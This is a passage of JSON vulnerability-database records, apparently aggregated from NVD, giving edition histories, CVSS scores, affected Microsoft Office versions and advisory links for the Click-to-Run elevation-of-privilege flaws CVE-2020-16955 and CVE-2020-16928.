"cpeConfiguration": {"CVE_data_version": "4.0", "nodes": []}, "cvelist": ["CVE-2020-16955"], "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "cwe": [], "description": "An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files, aka 'Microsoft Office Click-to-Run Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-16928, CVE-2020-16934.", "edition": 2, "enchantments": {"dependencies": {"modified": "2020-10-20T11:10:53", "references": [{"idList": ["MS:CVE-2020-16955"], "type": "mscve"}, {"idList": ["KLA11976"], "type": "kaspersky"}], "rev": 2}, "score": {"modified": "2020-10-20T11:10:53", "rev": 2, "value": 3.5, "vector": "NONE"}}, "hash": "15f5c77735945cc3c609b62ce6b5779d245dfbcf98715151d75a0472c74a19f7", "hashmap": [{"hash": "b4ccfad4424f2d7338159c9c26949e7b", "key": "description"}, {"hash": "853c5b524289598f560137e4983f02e8", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "ccdbc538dd5b4d39f6035c206ec1fa15", "key": "published"}, {"hash": "9a5f42b84e7cc06c4b7729d45f289f08", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cwe"}, {"hash": "c2446defffc859bf0498b825967541c5", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "15ffbc73449707a93845f54ba911bac0", "key": "cvelist"}, {"hash": "0a70a7011cff227bded54858f06ad826", "key": "references"}, {"hash": "81342635da437da3b0897e10f103e0d6", "key": "cpeConfiguration"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-16955", "id": "CVE-2020-16955", "lastseen": "2020-10-20T11:10:53", "modified": "2020-10-19T11:42:00", "objectVersion": "1.3", "published": "2020-10-16T23:15:00", "references": ["https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16955"], "reporter": "cve@mitre.org", "title": "CVE-2020-16955", "type": "cve", "viewCount": 31}, "differentElements": ["cpe23", "cvss", "cvss3", "cvss2", "modified", "cpe", "cwe", "affectedSoftware", "cpeConfiguration"], "edition": 2, "lastseen": "2020-10-20T11:10:53"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "microsoft:office", "name": "microsoft office", "operator": "eq", "version": "2013"}, {"cpeName": "microsoft:365_apps", "name": "microsoft 365 apps", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:office", "name": "microsoft office", "operator": "eq", "version": "2019"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:microsoft:365_apps:-", "cpe:/a:microsoft:office:2013", "cpe:/a:microsoft:office:2019"], "cpe23": ["cpe:2.3:a:microsoft:office:2019:*:*:*:*:-:*:*", "cpe:2.3:a:microsoft:office:2013:*:*:*:click-to-run:*:*:*", "cpe:2.3:a:microsoft:365_apps:-:*:*:*:enterprise:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:microsoft:office:2019:*:*:*:*:-:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:microsoft:365_apps:-:*:*:*:enterprise:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:microsoft:office:2013:*:*:*:click-to-run:*:*:*", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2020-16955"], "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "cwe": ["CWE-20"], "description": "An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files, aka 'Microsoft Office Click-to-Run Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-16928, CVE-2020-16934.", "edition": 3, "enchantments": {"dependencies": {"modified": "2020-10-22T10:49:04", "references": [{"idList": ["MS:CVE-2020-16955"], "type": "mscve"}, {"idList": ["KLA11976"], "type": "kaspersky"}], "rev": 2}, "score": {"modified": "2020-10-22T10:49:04", "rev": 2, "value": 3.5, "vector": "NONE"}}, "extraReferences": [], "hash": "ce9eaf6bd14a279aff40014959891f29eff5001608a17a40749f30e8c67e2818", "hashmap": [{"hash": "b4ccfad4424f2d7338159c9c26949e7b", "key": "description"}, {"hash": "15de0dd4b468af306a6c432a42227be9", "key": "cpeConfiguration"}, {"hash": "853c5b524289598f560137e4983f02e8", "key": "href"}, {"hash": "f0cab2ed51281c3cddb6cdf3ee00cdac", "key": "cvss2"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "226da5129ffaaee3d5b48e506b957d58", "key": "cwe"}, {"hash": "34b9d3cd48da8a2ca10ced6c1dc33c44", "key": "cpe23"}, {"hash": "ccdbc538dd5b4d39f6035c206ec1fa15", "key": "published"}, {"hash": "9a5f42b84e7cc06c4b7729d45f289f08", "key": "title"}, {"hash": "1384068fbd8bc4f34a3a4a821a5848fe", "key": "cvss3"}, {"hash": "4cac367be6dd8242802053610be9dee6", "key": "cvss"}, {"hash": "e62b06dbf0b010bd7ca3851bfd12bb58", "key": "cpe"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "5b4efb4a89011606ec7433597805d502", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "extraReferences"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "15ffbc73449707a93845f54ba911bac0", "key": "cvelist"}, {"hash": "0a70a7011cff227bded54858f06ad826", "key": "references"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "aa83c9d5d9e85525c325b86ee275ce90", "key": "affectedSoftware"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-16955", "id": "CVE-2020-16955", "lastseen": "2020-10-22T10:49:04", "modified": "2020-10-21T20:06:00", "objectVersion": "1.3", "published": "2020-10-16T23:15:00", "references": ["https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16955"], "reporter": "cve@mitre.org", "title": "CVE-2020-16955", "type": "cve", "viewCount": 44}, "differentElements": ["extraReferences"], "edition": 3, "lastseen": "2020-10-22T10:49:04"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "microsoft:office", "name": "microsoft office", "operator": "eq", "version": "2013"}, {"cpeName": "microsoft:365_apps", "name": "microsoft 365 apps", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:office", "name": "microsoft office", "operator": "eq", "version": "2019"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:microsoft:365_apps:-", "cpe:/a:microsoft:office:2013", "cpe:/a:microsoft:office:2019"], "cpe23": ["cpe:2.3:a:microsoft:office:2019:*:*:*:*:-:*:*", "cpe:2.3:a:microsoft:office:2013:*:*:*:click-to-run:*:*:*", "cpe:2.3:a:microsoft:365_apps:-:*:*:*:enterprise:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:microsoft:office:2019:*:*:*:*:-:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:microsoft:365_apps:-:*:*:*:enterprise:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:microsoft:office:2013:*:*:*:click-to-run:*:*:*", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2020-16955"], "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "cwe": ["CWE-20"], "description": "An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files, aka 'Microsoft Office Click-to-Run Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-16928, CVE-2020-16934.", "edition": 4, "enchantments": {"dependencies": {"modified": "2021-02-02T07:37:01", "references": [{"idList": ["MS:CVE-2020-16955"], "type": "mscve"}, {"idList": ["KLA11976"], "type": "kaspersky"}], "rev": 2}, "score": {"modified": "2021-02-02T07:37:01", "rev": 2, "value": 3.5, "vector": "NONE"}}, "extraReferences": [{"name": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16955", "refsource": "MISC", "tags": ["Patch", "Vendor Advisory"], "url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16955"}], "hash": "8503e440bbb7a8c588f3f6e53a8871a7b32818f3672335860dfe79387980a0df", "hashmap": [{"hash": "4a3aee4b54ce8b516813fbaf41c91f10", "key": "extraReferences"}, {"hash": "b4ccfad4424f2d7338159c9c26949e7b", "key": "description"}, {"hash": "15de0dd4b468af306a6c432a42227be9", "key": "cpeConfiguration"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "853c5b524289598f560137e4983f02e8", "key": "href"}, {"hash": "f0cab2ed51281c3cddb6cdf3ee00cdac", "key": "cvss2"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "226da5129ffaaee3d5b48e506b957d58", "key": "cwe"}, {"hash": "34b9d3cd48da8a2ca10ced6c1dc33c44", "key": "cpe23"}, {"hash": "ccdbc538dd5b4d39f6035c206ec1fa15", "key": "published"}, {"hash": "9a5f42b84e7cc06c4b7729d45f289f08", "key": "title"}, {"hash": "1384068fbd8bc4f34a3a4a821a5848fe", "key": "cvss3"}, {"hash": "4cac367be6dd8242802053610be9dee6", "key": "cvss"}, {"hash": "e62b06dbf0b010bd7ca3851bfd12bb58", "key": "cpe"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "5b4efb4a89011606ec7433597805d502", "key": "modified"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "15ffbc73449707a93845f54ba911bac0", "key": "cvelist"}, {"hash": "0a70a7011cff227bded54858f06ad826", "key": "references"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "aa83c9d5d9e85525c325b86ee275ce90", "key": "affectedSoftware"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-16955", "id": "CVE-2020-16955", "immutableFields": [], "lastseen": "2021-02-02T07:37:01", "modified": "2020-10-21T20:06:00", "objectVersion": "1.5", "published": "2020-10-16T23:15:00", "references": ["https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16955"], "reporter": "cve@mitre.org", "title": "CVE-2020-16955", "type": "cve", "viewCount": 45}, "different_elements": ["reporter", "cpeConfiguration"], "edition": 4, "lastseen": "2021-02-02T07:37:01"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "microsoft:office", "name": "microsoft office", "operator": "eq", "version": "2013"}, {"cpeName": "microsoft:365_apps", "name": "microsoft 365 apps", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:office", "name": "microsoft office", "operator": "eq", "version": "2019"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:microsoft:365_apps:-", "cpe:/a:microsoft:office:2013", "cpe:/a:microsoft:office:2019"], "cpe23": ["cpe:2.3:a:microsoft:office:2019:*:*:*:*:-:*:*", "cpe:2.3:a:microsoft:office:2013:*:*:*:click-to-run:*:*:*", "cpe:2.3:a:microsoft:365_apps:-:*:*:*:enterprise:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:a:microsoft:office:2019:*:*:*:*:-:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:microsoft:365_apps:-:*:*:*:enterprise:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:microsoft:office:2013:*:*:*:click-to-run:*:*:*", "cpe_name": [], "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2020-16955"], "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "cwe": ["CWE-20"], "description": "An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files, aka 'Microsoft Office Click-to-Run Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-16928, CVE-2020-16934.", "edition": 6, "enchantments": {"dependencies": {"modified": "2021-07-22T08:54:28", "references": [{"idList": ["MS:CVE-2020-16955"], "type": "mscve"}, {"idList": ["MSF:ILITIES/MICROSOFT-OFFICE-CVE-2020-16934/"], "type": "metasploit"}, {"idList": ["KLA11976"], "type": "kaspersky"}], "rev": 2}, "score": {"modified": "2021-07-22T08:54:28", "rev": 2, "value": 3.6, "vector": "NONE"}}, "extraReferences": [{"name": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16955", "refsource": "MISC", "tags": ["Patch", "Vendor Advisory"], "url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16955"}], "hash": "6953273ff99e55e5ee16ff6c97f172f17fc108e80b615391b1f84c11fb0547ce", "hashmap": [{"hash": "4a3aee4b54ce8b516813fbaf41c91f10", "key": "extraReferences"}, {"hash": "b4ccfad4424f2d7338159c9c26949e7b", "key": "description"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "853c5b524289598f560137e4983f02e8", "key": "href"}, {"hash": "f0cab2ed51281c3cddb6cdf3ee00cdac", "key": "cvss2"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "226da5129ffaaee3d5b48e506b957d58", "key": "cwe"}, {"hash": "34b9d3cd48da8a2ca10ced6c1dc33c44", "key": "cpe23"}, {"hash": "ccdbc538dd5b4d39f6035c206ec1fa15", "key": "published"}, {"hash": "9a5f42b84e7cc06c4b7729d45f289f08", "key": "title"}, {"hash": "1384068fbd8bc4f34a3a4a821a5848fe", "key": "cvss3"}, {"hash": "4cac367be6dd8242802053610be9dee6", "key": "cvss"}, {"hash": "e62b06dbf0b010bd7ca3851bfd12bb58", "key": "cpe"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "029dfc07c499dc142a429cac0a029e99", "key": "reporter"}, {"hash": "cfe79bfa013d4a3b73a902e04505ab33", "key": "cpeConfiguration"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "15ffbc73449707a93845f54ba911bac0", "key": "cvelist"}, {"hash": "0a70a7011cff227bded54858f06ad826", "key": "references"}, {"hash": "aa83c9d5d9e85525c325b86ee275ce90", "key": "affectedSoftware"}, {"hash": "183798fce373747341ba2f32f8021ac7", "key": "modified"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-16955", "id": "CVE-2020-16955", "immutableFields": [], "lastseen": "2021-07-22T08:54:28", "modified": "2021-07-21T11:39:00", "objectVersion": "1.5", "published": "2020-10-16T23:15:00", "references": ["https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16955"], "reporter": "secure@microsoft.com", "title": "CVE-2020-16955", "type": "cve", "viewCount": 48}, "different_elements": ["cwe"], "edition": 6, "lastseen": "2021-07-22T08:54:28"}], "edition": 7, "hashmap": [{"key": "affectedConfiguration", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "affectedSoftware", "hash": "aa83c9d5d9e85525c325b86ee275ce90"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "e62b06dbf0b010bd7ca3851bfd12bb58"}, {"key": "cpe23", "hash": "34b9d3cd48da8a2ca10ced6c1dc33c44"}, {"key": "cpeConfiguration", "hash": "cfe79bfa013d4a3b73a902e04505ab33"}, {"key": "cvelist", "hash": "15ffbc73449707a93845f54ba911bac0"}, {"key": "cvss", "hash": "4cac367be6dd8242802053610be9dee6"}, {"key": "cvss2", "hash": "f0cab2ed51281c3cddb6cdf3ee00cdac"}, {"key": "cvss3", "hash": "1384068fbd8bc4f34a3a4a821a5848fe"}, {"key": "cwe", "hash": "d370d473ba1bd1721d669ef98e2aeebb"}, {"key": "description", "hash": "b4ccfad4424f2d7338159c9c26949e7b"}, {"key": "extraReferences", "hash": "4a3aee4b54ce8b516813fbaf41c91f10"}, {"key": "href", "hash": "853c5b524289598f560137e4983f02e8"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "183798fce373747341ba2f32f8021ac7"}, {"key": "published", "hash": "ccdbc538dd5b4d39f6035c206ec1fa15"}, {"key": "references", "hash": "0a70a7011cff227bded54858f06ad826"}, {"key": "reporter", "hash": "029dfc07c499dc142a429cac0a029e99"}, {"key": "title", "hash": "9a5f42b84e7cc06c4b7729d45f289f08"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "c15ac5776a7a967ca025932f03d162e935b88c185703d77f2a89d333f94ef8eb", "viewCount": 70, "enchantments": {"dependencies": {"references": [{"type": "mscve", "idList": ["MS:CVE-2020-16955"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MICROSOFT-OFFICE-CVE-2020-16934/"]}, {"type": "kaspersky", "idList": ["KLA11976"]}], "modified": "2021-08-04T16:55:08", "rev": 2}, "score": {"value": 3.6, "vector": "NONE", "modified": "2021-08-04T16:55:08", "rev": 2}}, "objectVersion": "1.6", "cpe": ["cpe:/a:microsoft:365_apps:-", "cpe:/a:microsoft:office:2013", "cpe:/a:microsoft:office:2019"], "affectedSoftware": [{"cpeName": "microsoft:office", "name": "microsoft office", "operator": "eq", "version": "2013"}, {"cpeName": "microsoft:365_apps", "name": "microsoft 365 apps", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:office", "name": "microsoft office", "operator": "eq", "version": "2019"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:a:microsoft:office:2019:*:*:*:*:-:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:microsoft:365_apps:-:*:*:*:enterprise:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:microsoft:office:2013:*:*:*:click-to-run:*:*:*", "cpe_name": [], "vulnerable": true}], "operator": "OR"}]}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "cpe23": ["cpe:2.3:a:microsoft:office:2019:*:*:*:*:-:*:*", "cpe:2.3:a:microsoft:office:2013:*:*:*:click-to-run:*:*:*", "cpe:2.3:a:microsoft:365_apps:-:*:*:*:enterprise:*:*:*"], "cwe": ["NVD-CWE-noinfo"], "scheme": null, "extraReferences": [{"name": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16955", "refsource": "MISC", "tags": ["Patch", "Vendor Advisory"], "url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16955"}], "immutableFields": []}, {"id": "CVE-2020-16928", "bulletinFamily": "NVD", "title": "CVE-2020-16928", "description": "An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files, aka 'Microsoft Office Click-to-Run Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-16934, CVE-2020-16955.", "published": "2020-10-16T23:15:00", "modified": "2021-07-21T11:39:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-16928", "reporter": "secure@microsoft.com", "references": ["https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16928"], "cvelist": ["CVE-2020-16928"], "type": "cve", "lastseen": "2021-08-04T16:55:08", "history": [{"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "microsoft:office", "name": "microsoft office", "operator": "eq", "version": "2013"}, {"cpeName": "microsoft:365_apps", "name": "microsoft 365 apps", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:office", "name": "microsoft office", "operator": "eq", "version": "2019"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:microsoft:365_apps:-", "cpe:/a:microsoft:office:2013", "cpe:/a:microsoft:office:2019"], "cpe23": ["cpe:2.3:a:microsoft:office:2019:*:*:*:*:-:*:*", "cpe:2.3:a:microsoft:office:2013:*:*:*:click-to-run:*:*:*", "cpe:2.3:a:microsoft:365_apps:-:*:*:*:enterprise:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:a:microsoft:office:2019:*:*:*:*:-:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:microsoft:365_apps:-:*:*:*:enterprise:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:microsoft:office:2013:*:*:*:click-to-run:*:*:*", "cpe_name": [], "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2020-16928"], "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "cwe": ["CWE-269"], "description": "An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files, aka 'Microsoft Office Click-to-Run Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-16934, CVE-2020-16955.", "edition": 6, "enchantments": {"dependencies": {"modified": "2021-07-22T08:54:28", "references": [{"idList": ["MSF:ILITIES/MICROSOFT-OFFICE-CVE-2020-16934/"], "type": "metasploit"}, {"idList": ["MS:CVE-2020-16928"], "type": "mscve"}, {"idList": ["KLA11976"], "type": "kaspersky"}], "rev": 2}, "score": {"modified": "2021-07-22T08:54:28", "rev": 2, "value": 3.6, "vector": "NONE"}}, "extraReferences": [{"name": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16928", "refsource": "MISC", "tags": ["Patch", "Vendor Advisory"], "url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16928"}], "hash": "8d00e31c76c38b8cfc084bb20c757b06697445cba501fdf01ff77c02c3c3d9c0", "hashmap": [{"hash": "41963c590f226805fb1fb460db8b1a65", "key": "cvelist"}, {"hash": "725a48d60f4de20c0d99a90ed505ed73", "key": "references"}, {"hash": "a12b81fd55c2f86c58072a8b56df1494", "key": "cwe"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "147a83ecc362fe7740e366e9a77e6b76", "key": "title"}, {"hash": "f0cab2ed51281c3cddb6cdf3ee00cdac", "key": "cvss2"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "34b9d3cd48da8a2ca10ced6c1dc33c44", "key": "cpe23"}, {"hash": "ccdbc538dd5b4d39f6035c206ec1fa15", "key": "published"}, {"hash": "1384068fbd8bc4f34a3a4a821a5848fe", "key": "cvss3"}, {"hash": "4cac367be6dd8242802053610be9dee6", "key": "cvss"}, {"hash": "e62b06dbf0b010bd7ca3851bfd12bb58", "key": "cpe"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "029dfc07c499dc142a429cac0a029e99", "key": "reporter"}, {"hash": "ffddaffc8a726a4ab6205a210963731a", "key": "description"}, {"hash": "cfe79bfa013d4a3b73a902e04505ab33", "key": "cpeConfiguration"}, {"hash": "f093885b3be9a2577fd825d7e5828b90", "key": "href"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "fc1641170d6e1b71afa9fc7076a85c6f", "key": "extraReferences"}, {"hash": "aa83c9d5d9e85525c325b86ee275ce90", "key": "affectedSoftware"}, {"hash": "183798fce373747341ba2f32f8021ac7", "key": "modified"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-16928", "id": "CVE-2020-16928", "immutableFields": [], "lastseen": "2021-07-22T08:54:28", "modified": "2021-07-21T11:39:00", "objectVersion": "1.5", "published": "2020-10-16T23:15:00", "references": 